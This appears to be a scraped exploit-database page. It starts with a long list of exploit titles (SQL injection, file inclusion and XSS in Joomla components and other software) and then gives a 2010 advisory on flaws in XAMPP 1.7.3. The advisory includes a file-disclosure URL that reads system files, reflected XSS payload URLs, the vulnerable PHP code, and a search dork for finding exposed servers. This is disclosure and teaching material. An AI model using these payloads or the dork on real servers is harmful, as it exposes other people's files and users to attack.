
1 new exploits Google Android max86902 Driver - 'sysfs' Interfaces Race Condition Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution doop CMS 1.3.7 - (page) Local File Inclusion doop CMS 1.3.7 - Local File Inclusion Basic-CMS - 'acm2000.mdb' Remote Database Disclosure Basic-CMS - Remote Database Disclosure CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection CMS NetCat 3.12 - 'password_recovery.php' Blind SQL Injection StormBoard 1.0.1 - (thread.php id) SQL Injection Joomla! Component com_lowcosthotels - 'id' Blind SQL Injection Joomla! Component com_allhotels - 'id' Blind SQL Injection StormBoard 1.0.1 - SQL Injection Joomla! Component com_lowcosthotels - Blind SQL Injection Joomla! Component com_allhotels - Blind SQL Injection ILIAS 3.7.4 - (ref_id) Blind SQL Injection ILIAS 3.7.4 - 'ref_id' Parameter Blind SQL Injection Joomla! Component Live Ticker 1.0 - (tid) Blind SQL Injection Joomla! Component mdigg 2.2.8 - (category) SQL Injection Joomla! Component 5starhotels - 'id' SQL Injection Joomla! Component Live Ticker 1.0 - Blind SQL Injection Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection Joomla! Component 5starhotels - SQL Injection W2B phpEmployment - 'conf.inc' File Disclosure phpEmployment - 'conf.inc' File Disclosure phpGreetCards - 'conf.inc' Config File Disclosure phpGreetCards - Config File Disclosure Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion Joomla! Component com_bca-rss-syndicator - Local File Inclusion Joomla! Component 'com_appointment' 1.5 - Local File Inclusion Joomla! Component Appointment 1.5 - Local File Inclusion Joomla! Component 'com_awiki' - Local File Inclusion Joomla! Component aWiki - Local File Inclusion Joomla! Component 'com_articles' - SQL Injection Joomla! Component com_articles - SQL Injection Joomla! Component 'com_allvideos' - Blind SQL Injection Joomla! Component allvideos - Blind SQL Injection Joomla! Component 'Card View JX' - Cross-Site Scripting Joomla! Component Card View JX - Cross-Site Scripting Joomla! Component 'com_articleman' - Arbitrary File Upload Joomla! Component Article Factory Manager - Arbitrary File Upload Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion Joomla! Component aardvertiser 2.0 - Local File Inclusion Joomla! Component 'com_annonces' - Arbitrary File Upload Joomla! Component com_annonces - Arbitrary File Upload Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities Joomla! Component Answers 2.3beta - Multiple Vulnerabilities Joomla! Component 'com_beamospetition' - SQL Injection Joomla! Component com_beamospetition - SQL Injection Joomla! Component 'com_biblioteca' 1.0 Beta - Multiple SQL Injections Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection Joomla! Component 'com_alfurqan15x' - SQL Injection Joomla! Component com_alfurqan15x - SQL Injection Joomla! Component 'com_adsmanager' - Remote File Inclusion Joomla! Component com_adsmanager - Remote File Inclusion Joomla! Component 'com_acooldebate' 1.0.3 - Local File Inclusion Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion Joomla! Component 'com_a3000' - 'id' Parameter SQL Injection Joomla! Component AutoArticles 3000 - SQL Injection Joomla! Component 'com_annuaire' - 'id' Parameter SQL Injection Joomla! Component Annuaire - Parameter SQL Injection Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component 'com_bbs' - Multiple SQL Injections Joomla! Component com_bbs - Multiple SQL Injections Joomla! Component 'com_aclassfb' - Arbitrary File Upload Joomla! Component Almond Classifieds - Arbitrary File Upload Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting
70 lines
No EOL
2.5 KiB
Text
Executable file
70 lines
No EOL
2.5 KiB
Text
Executable file
# _ ____ __ __ ___
|
|
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
|
|
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
|
|
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
|
|
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
|
|
# Live by the byte |_/_/
|
|
#
|
|
# Members:
|
|
#
|
|
# Pr0T3cT10n
|
|
# -=M.o.B.=-
|
|
# TheLeader
|
|
# Sro
|
|
# Debug
|
|
#
|
|
# Contact: inv0ked.israel@gmail.com
|
|
#
|
|
# -----------------------------------
|
|
#
|
|
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites
|
|
# Date: 31/10/2010
|
|
# Author: TheLeader
|
|
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
|
|
# Affected Version: 1.7.3 and prior
|
|
# Tested on Windows XP Hebrew, Service Pack 3
|
|
# ISRAEL, NULLBYTE.ORG.IL
|
|
#
|
|
# -----------------------------------
|
|
|
|
I. File disclosure
|
|
|
|
XAMPP is vulnerable to a remote file disclosure attack.
|
|
The vulnerability exists within the web application supplied with XAMPP.
|
|
|
|
http://[host]/xampp/showcode.php/c:boot.ini?showcode=1
|
|
|
|
showcode.php:
|
|
<?php
|
|
echo '<br><br>';
|
|
if ($_REQUEST['showcode'] != 1) {
|
|
echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
|
|
} else {
|
|
$file = file_get_contents(basename($_SERVER['PHP_SELF']));
|
|
echo "<h2>".$TEXT['global-sourcecode']."</h2>";
|
|
echo "<textarea cols='100' rows='10'>";
|
|
echo htmlspecialchars($file);
|
|
echo "</textarea>";
|
|
}
|
|
?>
|
|
|
|
showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
|
|
What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.
|
|
basename() parses the last element of that path using "/" as a delimiter.
|
|
|
|
Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
|
|
Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.
|
|
|
|
II. Cross Site Scripting
|
|
|
|
http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
|
|
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>
|
|
|
|
It is interesting to see the same programming error lead to another security vulnerability.
|
|
Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
|
|
This can be exploited to perform Cross Site Scripting attacks.
|
|
|
|
biorhythm.php (line 75):
|
|
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
|
|
|
|
dork: "inurl:xampp/biorhythm.php" |